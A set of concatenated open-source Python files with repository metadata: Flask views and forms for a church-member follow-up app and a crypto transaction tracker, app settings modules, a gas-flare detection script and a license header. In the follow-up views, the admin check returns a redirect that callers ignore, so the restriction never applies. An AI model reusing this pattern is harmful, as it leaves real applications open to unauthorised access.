fecha_seg = DateField(u'Fecha de la entrada',
validators=[DataRequired()])
tipo_seg = SelectField(u'Tipo de Contacto',
coerce=int,
choices=[(0, 'LLAMADA'),
(1, 'MENSAJE'),
(2, 'PRESENCIAL'),
(3, 'OTRO')])
comentarios_seg = StringField(u'Comentarios',
widget=TextArea())
submit = SubmitField(u'Aceptar')
class ConsultaSegForm(FlaskForm):
"""
Consulta de seguimientos
"""
id_miembro = HiddenField("idDir")
nomyape = StringField(u'Nombres y Apellidos de la Persona:')
submit = SubmitField(u'Buscar')
| {
"repo_name": "originaltebas/chmembers",
"path": "app/seguimientos/forms.py",
"copies": "1",
"size": "1228",
"license": "mit",
"hash": -5576548330953486000,
"line_mean": 28.2380952381,
"line_max": 64,
"alpha_frac": 0.5806188925,
"autogenerated": false,
"ratio": 3.7099697885196377,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47905886810196374,
"avg_score": null,
"num_lines": null
} |
# app/seguimientos/views.py
# coding: utf-8
from flask import flash, jsonify
from flask import redirect, render_template, url_for, request
from flask_login import current_user, login_required
from app.seguimientos import seguimientos
from app.seguimientos.forms import SeguimientoForm, ConsultaSegForm
from app import db
from app.models import Seguimiento, Miembro
def check_edit_or_admin():
"""
Si no es admin o editor lo manda al inicio
"""
if not current_user.get_urole() >= 1:
return redirect(url_for("home.hub"))
def check_only_admin():
"""
Si no es admin o editor lo manda al inicio
"""
if not current_user.get_urole() == 2:
return redirect(url_for("home.hub"))
@seguimientos.route('/seguimientos', methods=['GET'])
@login_required
def ver_seguimientos():
"""
Lista de los seguimientos realizados a las personas
SOLO ACCESIBLE A ADMINISTRADORES
"""
check_only_admin()
# de arranque carga el listado
flag_listar = True
# flag_crear = False
# flag_consultar = False
query_seguimientos = db.session.query(Seguimiento)\
.join(Miembro,
Seguimiento.id_miembro ==
Miembro.id)\
.add_columns(Seguimiento.fecha_seg,
Seguimiento.comentarios_seg,
Seguimiento.tipo_seg,
Seguimiento.id,
Seguimiento.id_miembro,
Miembro.fullname)\
.order_by(Seguimiento.fecha_seg.desc())
return render_template('seguimientos/base_seguimientos.html',
seguimientos=query_seguimientos,
flag_listar=flag_listar)
@seguimientos.route('/seguimientos/crear', methods=['GET', 'POST'])
@login_required
def crear_seguimiento():
"""
Crear una entrada de seguimiento
"""
check_only_admin()
# Variable para el template. Para decirle si es Alta o Modif
flag_listar = False
flag_crear = True
# flag_consultar = False
form = SeguimientoForm()
if form.validate_on_submit():
obj_seg = Seguimiento(fecha_seg=form.fecha_seg.data,
comentarios_seg=form.comentarios_seg.data,
id_miembro=form.id_miembro.data,
tipo_seg=form.tipo_seg.data)
try:
db.session.add(obj_seg)
db.session.commit()
flash('Has guardado los datos correctamente', 'success')
except Exception as e:
flash('Error:' + str(e), 'danger')
return redirect(url_for('seguimientos.ver_seguimientos'))
return render_template(
'seguimientos/base_seguimientos.html',
add_seguimiento=flag_crear, flag_listar=flag_listar, form=form)
@seguimientos.route('/seguimientos/modif/<int:id>',
methods=['GET', 'POST'])
@login_required
def modif_seguimiento(id):
"""
Modificar un seguimiento
"""
check_only_admin()
flag_crear = False
flag_listar = False
# flag_consultar = False
obj_seg = Seguimiento.query.get_or_404(id)
miembro = Miembro.query.get_or_404(obj_seg.id_miembro)
form = SeguimientoForm(obj=obj_seg)
# print('req: ', request.method)
# print('sub: ', form.is_submitted())
# print('val: ', form.validate())
# er = ""
# for field, errors in form.errors.items():
# for error in errors:
# er = er + "Campo: " +\
# getattr(form, field).label.text +\
# " - Error: " +\
# error + "<br/>"
# print(er)
if request.method == 'GET':
form.fecha_seg.data = obj_seg.fecha_seg
form.comentarios_seg.data = obj_seg.comentarios_seg
form.tipo_seg.data = obj_seg.tipo_seg
form.id_miembro.data = obj_seg.id_miembro
if request.method == 'POST':
if form.validate_on_submit():
obj_seg.fecha_seg = form.fecha_seg.data
obj_seg.comentarios_seg = form.comentarios_seg.data
obj_seg.tipo_seg = form.tipo_seg.data
obj_seg.id_miembro = form.id_miembro.data
try:
db.session.commit()
flash('Has modificado los datos correctamente', 'success')
except Exception as e:
flash('Error: ' + str(e), 'danger')
return redirect(url_for('seguimientos.ver_seguimientos'))
return render_template(
'seguimientos/base_seguimientos.html', miembro=miembro,
add_seguimiento=flag_crear, flag_listar=flag_listar, form=form)
@seguimientos.route('/seguimientos/borrar/<int:id>',
methods=['GET'])
@login_required
def borrar_seguimiento(id):
"""
Borrar una entrada de seguimiento
"""
check_only_admin()
obj_seg = Seguimiento.query.get_or_404(id)
try:
db.session.delete(obj_seg)
db.session.commit()
flash('Has borrado los datos correctamente', 'success')
except Exception as e:
flash('Error: ' + str(e), 'danger')
return redirect(url_for('seguimientos.ver_seguimientos'))
@seguimientos.route('/seguimientos/consultas',
methods=['GET', 'POST'])
@login_required
def consulta_seguimientos():
"""
Consultar los seguimientos de una persona
"""
check_only_admin()
# flag_crear = False
# flag_listar = False
flag_consultar = True
form = ConsultaSegForm()
if form.validate_on_submit():
listado_segs = db.session.query(Seguimiento)\
.join(Miembro,
Seguimiento.id_miembro ==
Miembro.id)\
.add_columns(Seguimiento.fecha_seg,
Seguimiento.comentarios_seg,
Seguimiento.tipo_seg,
Seguimiento.id,
Seguimiento.id_miembro,
Miembro.fullname)\
.order_by(Seguimiento.fecha_seg.desc())\
.filter(Seguimiento.id_miembro ==
form.id_miembro.data).all()
return render_template(
'seguimientos/base_seguimientos.html',
flag_consultar=flag_consultar, form=form,
seguimientos=listado_segs, flag_seguimientos=True)
return render_template(
'seguimientos/base_seguimientos.html',
flag_consultar=flag_consultar, form=form)
def Convert(tup, di):
for a, b in tup:
di.setdefault("id", a)
di.setdefault("name", b)
return di
@seguimientos.route('/seguimientos/autocomplete', methods=['GET'])
def autocomplete():
search = request.args.get('q')
# query = db.session.query(Miembro)\
# .filter(Miembro.fullname.like('%' + str(search) + '%'))
# results = [mv[0] for mv in query.all()]
results = [(row.id, row.fullname)
for row in Miembro.query
.filter(
Miembro.fullname.like('%' + str(search) + '%')).all()]
resdic = {}
Convert(results, resdic)
print(resdic)
return jsonify(matching_results=resdic)
| {
"repo_name": "originaltebas/chmembers",
"path": "app/seguimientos/views.py",
"copies": "1",
"size": "7695",
"license": "mit",
"hash": 8449344635153801000,
"line_mean": 32.025751073,
"line_max": 79,
"alpha_frac": 0.5420402859,
"autogenerated": false,
"ratio": 3.4383378016085793,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4480378087508579,
"avg_score": null,
"num_lines": null
} |
# app/server/__init__.py
#################
#### imports ####
#################
import os
from flask import Flask, render_template
from flask_login import LoginManager
from flask_bcrypt import Bcrypt
from flask_debugtoolbar import DebugToolbarExtension
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
################
#### config ####
################
app = Flask(
__name__,
template_folder='../client/templates',
static_folder='../client/static'
)
app_settings = os.getenv('APP_SETTINGS', 'app.server.config.DevelopmentConfig')
app.config.from_object(app_settings)
####################
#### extensions ####
####################
login_manager = LoginManager()
login_manager.init_app(app)
bcrypt = Bcrypt(app)
toolbar = DebugToolbarExtension(app)
bootstrap = Bootstrap(app)
db = SQLAlchemy(app)
###################
### blueprints ####
###################
from app.server.user.views import user_blueprint
from app.server.main.views import main_blueprint
app.register_blueprint(user_blueprint)
app.register_blueprint(main_blueprint)
###################
### flask-login ####
###################
from app.server.models import User
login_manager.login_view = "user.login"
login_manager.login_message_category = 'danger'
@login_manager.user_loader
def load_user(user_id):
return User.query.filter(User.id == int(user_id)).first()
########################
#### error handlers ####
########################
@app.errorhandler(401)
def unauthorized_page(error):
return render_template("errors/401.html"), 401
@app.errorhandler(403)
def forbidden_page(error):
return render_template("errors/403.html"), 403
@app.errorhandler(404)
def page_not_found(error):
return render_template("errors/404.html"), 404
@app.errorhandler(500)
def server_error_page(error):
return render_template("errors/500.html"), 500
| {
"repo_name": "samuelhwilliams/cryptracker-web",
"path": "app/server/__init__.py",
"copies": "1",
"size": "1883",
"license": "mit",
"hash": -7563355987272359000,
"line_mean": 19.6923076923,
"line_max": 79,
"alpha_frac": 0.6383430696,
"autogenerated": false,
"ratio": 3.684931506849315,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.980299958000385,
"avg_score": 0.004054999289092926,
"num_lines": 91
} |
# app/server/models.py
import enum
import datetime
from sqlalchemy import UniqueConstraint
from app.server import app, db, bcrypt
class User(db.Model):
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
email = db.Column(db.String(255), unique=True, index=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
registered_on = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
admin = db.Column(db.Boolean, nullable=False, default=False)
accounts = db.relationship('Account', backref='user', lazy='dynamic')
def __init__(self, email, password, admin=False):
self.email = email
self.password = bcrypt.generate_password_hash(
password, app.config.get('BCRYPT_LOG_ROUNDS')
).decode('utf-8')
self.registered_on = datetime.datetime.now()
self.admin = admin
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
def __repr__(self):
return '<User {0}>'.format(self.email)
class CurrencyCategory(enum.Enum):
Fiat = 1
Crypto = 2
class Currency(db.Model):
__tablename__ = "currencies"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
category = db.Column(db.Enum(CurrencyCategory), nullable=False, index=True)
code = db.Column(db.String(5), nullable=False, index=True)
name = db.Column(db.String(256), nullable=False)
def __init__(self, category, code, name):
self.category = category
self.code = code
self.name = name
class Account(db.Model):
__tablename__ = "accounts"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=False, index=True)
currency_id = db.Column(db.Integer, db.ForeignKey('currencies.id'), nullable=False, index=True)
primary_account = db.Column(db.Boolean, nullable=False, default=False)
created_on = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
transactions = db.relationship('Transaction', backref='user', lazy='dynamic')
currency = db.relationship('Currency', backref='accounts', lazy='joined')
def __init__(self, user_id, currency_id, primary_account=False):
self.user_id = user_id
self.currency_id = currency_id
self.primary_account = primary_account
self.created_on = datetime.datetime.utcnow()
class Transaction(db.Model):
__tablename__ = "transactions"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=False, index=True)
datetime = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
value = db.Column(db.Float, nullable=False)
from_currency = db.Column(db.Integer, db.ForeignKey('currencies.id'), nullable=False, index=True)
from_volume = db.Column(db.Float, nullable=False)
from_wallet = db.Column(db.String(256), nullable=False, default='')
to_currency = db.Column(db.Integer, db.ForeignKey('currencies.id'), nullable=False, index=True)
to_volume = db.Column(db.Float, nullable=False)
to_wallet = db.Column(db.String(256), nullable=False, default='')
stake = db.Column(db.Float, nullable=False)
broker = db.Column(db.String(256), nullable=False, default='')
tx_id = db.Column(db.String(256), nullable=False, default='')
notes = db.Column(db.String(256), nullable=False, default='')
def __init__(self, user_id, value, from_currency, from_volume, to_currency, to_volume,
stake=0, from_wallet='', to_wallet='', broker='', tx_id='', notes='', trans_datetime=None):
self.user_id = user_id
self.datetime = trans_datetime or datetime.datetime.utcnow()
self.value = value
self.from_currency = from_currency
self.from_volume = from_volume
self.to_currency = to_currency
self.to_volume = to_volume
self.stake = stake
self.from_wallet = from_wallet
self.to_wallet = to_wallet
self.broker = broker
self.tx_id = tx_id
self.notes = notes
| {
"repo_name": "samuelhwilliams/cryptracker-web",
"path": "app/server/models.py",
"copies": "1",
"size": "4335",
"license": "mit",
"hash": 7975792705621883000,
"line_mean": 33.9596774194,
"line_max": 108,
"alpha_frac": 0.6620530565,
"autogenerated": false,
"ratio": 3.5737840065952184,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47358370630952185,
"avg_score": null,
"num_lines": null
} |
# app/server/user/forms.py
from flask_login import current_user
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, DateTimeField, DecimalField, SelectField
from wtforms.ext.sqlalchemy.fields import QuerySelectField
from wtforms.validators import DataRequired, Email, Length, EqualTo, Optional
from ..models import CurrencyCategory, Currency, Account
class LoginForm(FlaskForm):
email = StringField('Email Address', [DataRequired(), Email()])
password = PasswordField('Password', [DataRequired()])
class RegisterForm(FlaskForm):
email = StringField(
'Email Address',
validators=[
DataRequired(),
Email(message=None),
Length(min=6, max=40)
]
)
password = PasswordField(
'Password',
validators=[DataRequired(), Length(min=6, max=25)]
)
confirm = PasswordField(
'Confirm password',
validators=[
DataRequired(),
EqualTo('password', message='Passwords must match.')
]
)
class NewAccountForm(FlaskForm):
currency_code = QuerySelectField('Currency Code', validators=[DataRequired()],
query_factory=lambda: Currency.query.filter(~Currency.accounts.any(Account.user_id == current_user.id)).all(),
get_label='code')
class NewCurrencyForm(FlaskForm):
category = SelectField('Category', validators=[DataRequired()], choices=[(x, x.name) for x in CurrencyCategory])
code = StringField('Currency Code', validators=[DataRequired()])
name = StringField('Currency Name', validators=[DataRequired()])
class NewTransactionForm(FlaskForm):
datetime = DateTimeField('Date & Time', validators=[Optional()])
value = DecimalField('Value', validators=[Optional()])
from_currency = QuerySelectField('Currency (from)', validators=[DataRequired()],
query_factory=lambda: Account.query.filter_by(user_id=current_user.id).join(Account.currency).distinct(Currency.id).all(),
get_label='currency.code'
)
from_volume = DecimalField('Volume (from)', validators=[DataRequired()])
from_wallet = StringField('Wallet (from)', validators=[Optional()])
to_currency = QuerySelectField('Currency (to)', validators=[DataRequired()],
query_factory=lambda: Account.query.filter_by(user_id=current_user.id).join(Account.currency).distinct(Currency.id).all(),
get_label='currency.code'
)
to_volume = DecimalField('Volume (to)', validators=[DataRequired()])
to_wallet = StringField('Wallet (to)', validators=[Optional()])
stake = DecimalField('Stake', validators=[Optional()])
broker = StringField('Broker', validators=[Optional()])
tx_id = StringField('TX ID', validators=[Optional()])
notes = StringField('Notes', validators=[Optional()])
| {
"repo_name": "samuelhwilliams/cryptracker-web",
"path": "app/server/user/forms.py",
"copies": "1",
"size": "3054",
"license": "mit",
"hash": 176408980378696800,
"line_mean": 40.2702702703,
"line_max": 159,
"alpha_frac": 0.6299934512,
"autogenerated": false,
"ratio": 4.627272727272727,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5757266178472727,
"avg_score": null,
"num_lines": null
} |
# app/server/user/views.py
from flask import render_template, Blueprint, url_for, redirect, flash, request, abort
from flask_login import login_user, logout_user, login_required, current_user
from app.server import bcrypt, db
from app.server.models import User, Account, Transaction, Currency
from app.server.user.forms import LoginForm, RegisterForm, NewAccountForm, NewCurrencyForm, NewTransactionForm
user_blueprint = Blueprint('user', __name__,)
@user_blueprint.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if form.validate_on_submit():
user = User(
email=form.email.data,
password=form.password.data
)
db.session.add(user)
db.session.commit()
login_user(user)
flash('Thank you for registering.', 'success')
return redirect(url_for("user.accounts"))
return render_template('user/register.html', form=form)
@user_blueprint.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user and bcrypt.check_password_hash(
user.password, request.form['password']):
login_user(user)
flash('You are logged in. Welcome!', 'success')
return redirect(url_for('user.accounts'))
else:
flash('Invalid email and/or password.', 'danger')
return render_template('user/login.html', form=form)
return render_template('user/login.html', title='Please Login', form=form)
@user_blueprint.route('/logout')
@login_required
def logout():
logout_user()
flash('You were logged out. Bye!', 'success')
return redirect(url_for('main.home'))
@user_blueprint.route('/accounts', methods=['GET', 'POST'])
@login_required
def accounts():
form = NewAccountForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
currency = Currency.query.filter_by(id=form.currency_code.data.id).first()
if currency is None:
abort(400)
account = Account(user_id=current_user.id, currency_id=currency.id)
other_account_in_category = Account.query.join(Account.currency).filter(Currency.category == currency.category).first()
if other_account_in_category is None:
account.primary_account = True
db.session.add(account)
db.session.commit()
flash('New account for {} ({}) has been created.'.format(currency.code, currency.name), 'success')
else:
flash(form.errors, 'danger')
return render_template('user/accounts.html',
form=form,
accounts=Account.query.filter_by(user_id=current_user.id).all())
@user_blueprint.route('/currencies')
@login_required
def currencies():
form = NewCurrencyForm(request.form)
return render_template('user/currencies.html',
form=form,
currencies=Currency.query.all())
@user_blueprint.route('/transactions', methods=['GET', 'POST'])
@login_required
def transactions():
form = NewTransactionForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
value = 100.00
stake = 0.00
transaction = Transaction(user_id=current_user.id, value=value, from_currency=form.from_currency.data,
from_volume=form.from_volume.data, to_currency=form.to_currency.data,
to_volume=form.to_volume.data, stake=stake, from_wallet='', to_wallet='',
broker='', tx_id='', notes='')
db.session.add(transaction)
db.session.commit()
flash('New transaction has been logged.', 'success')
else:
flash(form.errors, 'danger')
transactions = Transaction.query.filter_by(user_id=current_user.id)
return render_template('user/transactions.html',
form=form,
transactions=transactions)
| {
"repo_name": "samuelhwilliams/cryptracker-web",
"path": "app/server/user/views.py",
"copies": "1",
"size": "4239",
"license": "mit",
"hash": 4774044470634473000,
"line_mean": 35.2307692308,
"line_max": 131,
"alpha_frac": 0.6109931588,
"autogenerated": false,
"ratio": 4.018009478672986,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0007379087984618552,
"num_lines": 117
} |
# AppSettings class - holds app settings for whatever app you desire.
#
# by Eron Hennessey
#
# for now, we use cPickle to store settings.
import os
import sys
import cPickle
class AppSettings:
"""Holds app settings and can also load and save them."""
def __init__(self, app_name):
"""Initialize the AppSettings object with the app name. The settings
are identified by it."""
self.app_name = app_name
self.settings = {}
self.loaded = False
self.load()
def _open_settings_file(self, mode):
# Open the settings file with the given mode (usually either 'rb' or
# 'wb')
settings_file_name = os.path.join(os.path.expanduser('~'), '.%s' %
self.app_name)
return open(settings_file_name, mode)
def set(self, name, value):
"""Set a setting value. If the setting doesn't yet exist, it will be
created."""
self.settings[name] = value
def has(self, name):
"""Just return True or false if the named setting exists"""
return (name in self.settings)
def get(self, name):
"""Get a setting value. If the setting doesn't exist, None will be
returned."""
if name == None or not self.has(name):
return None
return self.settings[name]
def list(self):
"""List the settings (keys) that exist."""
return self.settings.keys()
def remove(self, name):
"""Remove a setting. If the setting doesn't exist, nothing happens."""
if name in self.settings.keys():
del(self.settings[name])
def load(self):
"""Loads the settings from the store (wherever that is)."""
loaded_settings = None
try:
settings_file = self._open_settings_file('rb')
loaded_settings = cPickle.load(settings_file)
if loaded_settings != None:
self.settings = loaded_settings
self.loaded = True
settings_file.close()
except:
pass
def save(self):
"""Saves the settings to the store (wherever that is)."""
settings_file = self._open_settings_file('wb')
cPickle.dump(self.settings, settings_file)
settings_file.close()
| {
"repo_name": "Abstrys/pyoculus",
"path": "abstrys/app_settings.py",
"copies": "1",
"size": "2282",
"license": "bsd-3-clause",
"hash": -5229093944531909000,
"line_mean": 31.1408450704,
"line_max": 78,
"alpha_frac": 0.5902716915,
"autogenerated": false,
"ratio": 4.17948717948718,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.016812200552227863,
"num_lines": 71
} |
"""App settings for Sana project.
This file contains the application configuration variables and should be
renamed to
local_settings.py
prior to filling in values. Once updated, enter the following from the mds
installation directory:
$> ./manage.py syncdb
This will require root privileges.
:Authors: Sana Development Team
:Version: 2.0
"""
API_VERSION = '2.0'
APICOMPAT_INCLUDE = ('v1',)
PATH_PREFIX = ""
# REST related settings
DEFAULT_LIMIT = 10
""" default number of objects per page """
REST_REPS = {
'default': ['uuid', 'uri'],
'link':['uuid', 'uri'],
'full':['uuid', 'uri']
}
REST_OBJECT_REPS = {
'concept': [],
'device': [],
'encounter': [],
'notification': [],
'observer':[],
'observer':[],
'requestlog':[],
'subject': [],
}
### OpenMRS settings. OpenMRS versions seem to have some difference in submitted
### date format.
OPENMRS_VERSION = 1.9
"""Version of OpenMRS used as backend. Default is 1.9"""
OPENMRS_SERVER_URL = 'http://localhost/openmrs/'
"""Change localhost when deployed."""
OPENMRS_DATE_FMT = '%m/%d/%Y %H:%M'
"""For OpenMRS ver. 1.6. Set to %d/%m/%Y when using OpenMRS 1.7."""
OPENMRS_REPLYTO = ''
"""Reply address for notifications from OpenMRS."""
### Clickatell Settings
CLICKATELL_URI = 'http://api.clickatell.com/http/sendmsg?%s'
"""Example 'http://api.clickatell.com/http/sendmsg?%s'"""
CLICKATELL_USER = ''
"""A valid username."""
CLICKATELL_PASSWORD = ''
"""A valid password."""
CLICKATELL_API = ''
"""Refer to Clickatell documentation for this value."""
### Kannel Settings
KANNEL_URI = ''
"""URI Example: 'http://127.0.0.1:12121/cgi-bin/sendsms?%s'"""
KANNEL_USER = ''
"""A valid username."""
KANNEL_PASSWORD = ''
### ZniSMS Settings
ZNISMS_URL = ''
"""URI. Example: http://api.znisms.com/post/smsv3.asp?%s"""
ZNISMS_USER = ''
"""Consult ZniSMS documentation."""
ZNISMS_APIKEY = ''
"""Consult ZniSMS documentation."""
ZNISMS_SENDERID = ''
"""Consult ZniSMS documentation."""
### Email Configuration
EMAIL_HOST = ''
"""Outgoing mail server."""
EMAIL_HOST_USER = ''
"""Password for account used to send."""
EMAIL_HOST_PASSWORD = ''
"""Password for account used to send."""
EMAIL_PORT = '587'
"""Check with mail host, i.e. gmail uses 587, aws uses 25, 465, 587"""
EMAIL_USE_TLS = True
"""Check with mail host if encryption is supported"""
REVIEW_POST_TEMPLATE = "Data requiring review has been uploaded:\n\nDesktop: %s\n\nMobile: %s"
REVIEW_SUBJECT="Review required"
SMTP_REPLYTO = ""
REVIEW_ADDRESSES = []
CONVERT_MEDIA = False
"""Set to True to convert media; i.e. if you are uploading audio or video."""
FLUSH_SAVEDPROCEDURE = False
"""Set to True to flush text data on successful send."""
FLUSH_BINARYRESOURCE = False
"""Set to True to flush file data on successful send."""
FLUSH_NOTIFICATION = False
# Set to True to flush notification data on successful send."""
CONTENT_TYPES = (("text/plain", "Text"),
("image/jpg","Image"),
("audio/3gp","Audio"),
("video/3gp", "Video"),
("application/octet-stream", "Binary"))
# For the concept models
DATATYPES = ('string', 'number', 'boolean', 'complex')
MIMETYPES = (("text/plain", "Text"),
("image/jpg","Image"),
("audio/3gp","Audio"),
("video/3gp", "Video"),
("application/json", "JSON"),
("application/xml", "XML"),
("application/octet-stream", "Binary"))
EXTENSIONS = (("text/plain", ".txt"),
("image/jpg",".jpg"),
("audio/3gp",".3gp"),
("video/3gp", ".3gp"),
("application/json", ".json"),
("application/xml", ".xml"),
("application/octet-stream", ".bin"))
| {
"repo_name": "dekatzenel/team-k",
"path": "mds/local_settings.py",
"copies": "2",
"size": "3799",
"license": "bsd-3-clause",
"hash": -1738444109961600000,
"line_mean": 27.3507462687,
"line_max": 94,
"alpha_frac": 0.6112134772,
"autogenerated": false,
"ratio": 3.329535495179667,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9823439298936527,
"avg_score": 0.023461934688628058,
"num_lines": 134
} |
"""apps/forms.py: """
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, \
TextField, TextAreaField, HiddenField
from wtforms.validators import DataRequired, InputRequired
from wtforms.validators import ValidationError
def bad_chars(form, string_field):
for c in r";'`":
if c in string_field.data:
raise ValidationError('DONT TYPE DAT')
class ChatForm(FlaskForm):
"""Creates a chat_form for users to enter input."""
message = StringField('message', validators=[DataRequired()])
submit = SubmitField('Submit')
class UserForm(FlaskForm):
"""Form for creating/editing a user."""
name = StringField(label='name',
id='user-name',
validators=[DataRequired(), bad_chars])
submit = SubmitField(label='Submit')
class SentencePairForm(FlaskForm):
input_sentence = StringField(
label='input-sentence',
id='input-sentence',
validators=[DataRequired()])
response_sentence = StringField(
label='response-sentence',
id='response-sentence',
validators=[DataRequired()])
submit = SubmitField(label='Submit')
| {
"repo_name": "mckinziebrandon/DeepChatModels",
"path": "webpage/deepchat/main/forms.py",
"copies": "1",
"size": "1172",
"license": "mit",
"hash": -1041254498351788700,
"line_mean": 27.5853658537,
"line_max": 65,
"alpha_frac": 0.6672354949,
"autogenerated": false,
"ratio": 4.2773722627737225,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5444607757673723,
"avg_score": null,
"num_lines": null
} |
#!/apps/jasmin/jaspy/miniconda_envs/jaspy3.7/m3-4.6.14/envs/jaspy3.7-m3-4.6.14-r20200606/bin/python3
import os
import sys
import epr
import pandas as pd
import numpy as np
from src.ggf.detectors import ATXDetector, SLSDetector
import src.utils as utils
import src.config.filepaths as fp
def merge_hotspot_dataframes(atx_persistent_df, sls_persistent_df):
atx_persistent_df['sensor'] = 1
sls_persistent_df['sensor'] = -1
appended_df = atx_persistent_df.append(sls_persistent_df)
hotspot_df = appended_df.groupby(['lats_arcmin', 'lons_arcmin'], as_index=False).agg({'sensor': np.sum})
# the below information is not used here but we can use this
# idea to update the sensor information during the post processing
hotspot_df.sensor.loc[hotspot_df.sensor == 1] = 'atx'
hotspot_df.sensor.loc[hotspot_df.sensor == -1] = 'sls'
hotspot_df.sensor.loc[hotspot_df.sensor == 0] = 'both'
return hotspot_df
def aggregate(df, aggregator):
return df.groupby(['grid_y', 'grid_x'], as_index=False).agg(aggregator)
def main():
file_to_process = sys.argv[1]
sensor = sys.argv[2]
if sensor != 'sls':
product = epr.Product(file_to_process)
HotspotDetector = ATXDetector(product)
flare_keys = ['latitude',
'longitude',
'local_cloudiness',
'swir_16',
'frp',
'pixel_size',
'mwir',
'background_mwir']
flare_aggregator = {'frp': np.sum,
'swir_16': np.mean,
'mwir': np.mean,
'background_mwir': np.mean,
'pixel_size': np.sum,
'latitude': np.mean,
'longitude': np.mean,
'local_cloudiness': np.mean,
'year': 'first',
'month': 'first',
'day': 'first',
'hhmm': 'first'}
sampling_keys = ['latitude',
'longitude',
'local_cloudiness']
sampling_aggregator = {'local_cloudiness': np.mean,
'year': 'first',
'month': 'first',
'day': 'first',
'hhmm': 'first'}
atx_persistent_fp = os.path.join(fp.output_l3,
'all_sensors',
'all_flare_locations_ats.csv')
persistent_df = pd.read_csv(atx_persistent_fp)
else:
product = utils.extract_zip(file_to_process, fp.slstr_extract_temp)
HotspotDetector = SLSDetector(product)
flare_keys = ['latitude',
'longitude',
'local_cloudiness',
'swir_16',
'swir_22',
'frp',
'pixel_size']
flare_aggregator = {'frp': np.sum,
'swir_16': np.mean,
'swir_22': np.mean,
'pixel_size': np.sum,
'latitude': np.mean,
'longitude': np.mean,
'local_cloudiness': np.mean,
'year': 'first',
'month': 'first',
'day': 'first',
'hhmm': 'first'}
sampling_keys = ['latitude',
'longitude',
'local_cloudiness',
]
sampling_aggregator = {'local_cloudiness': np.mean,
'year': 'first',
'month': 'first',
'day': 'first',
'hhmm': 'first'
}
# merge persistent dataframes for SLSTR
atx_persistent_fp = os.path.join(fp.output_l3,
'all_sensors',
'all_flare_locations_atx.csv')
atx_persistent_df = pd.read_csv(atx_persistent_fp)
sls_persistent_fp = os.path.join(fp.output_l3,
'all_sensors',
'all_flare_locations_sls.csv')
sls_persistent_df = pd.read_csv(sls_persistent_fp)
persistent_df = merge_hotspot_dataframes(atx_persistent_df,
sls_persistent_df)
# find persistent hotspots (i.e. flares)
HotspotDetector.run_detector(flares_or_sampling=True)
flare_df = HotspotDetector.to_dataframe(keys=flare_keys,
joining_df=persistent_df)
aggregated_flare_df = aggregate(flare_df, flare_aggregator)
aggregated_flare_df.to_csv(utils.build_outpath(sensor, file_to_process, 'flares'))
# get sampling associated with persistent hotspots
sampling_df = HotspotDetector.to_dataframe(keys=sampling_keys,
joining_df=persistent_df)
aggregated_sampling_df = aggregate(sampling_df, sampling_aggregator)
aggregated_sampling_df.to_csv(utils.build_outpath(sensor, file_to_process, 'samples'))
if __name__ == "__main__":
main()
| {
"repo_name": "dabillox/kcl-globalgasflaring",
"path": "src/scripts/batch/flares.py",
"copies": "1",
"size": "5506",
"license": "mit",
"hash": -8415630570330784000,
"line_mean": 38.0496453901,
"line_max": 108,
"alpha_frac": 0.4673083908,
"autogenerated": false,
"ratio": 4.102831594634873,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5070139985434873,
"avg_score": null,
"num_lines": null
} |
"""apps module for the django_xmlrpc package
Authors::
Julien Fache
Credit must go to Brendan W. McAdams <brendan.mcadams@thewintergrp.com>, who
posted the original SimpleXMLRPCDispatcher to the Django wiki:
http://code.djangoproject.com/wiki/XML-RPC
New BSD License
===============
Copyright (c) 2007, Graham Binns http://launchpad.net/~codedragon
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the <ORGANIZATION> nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
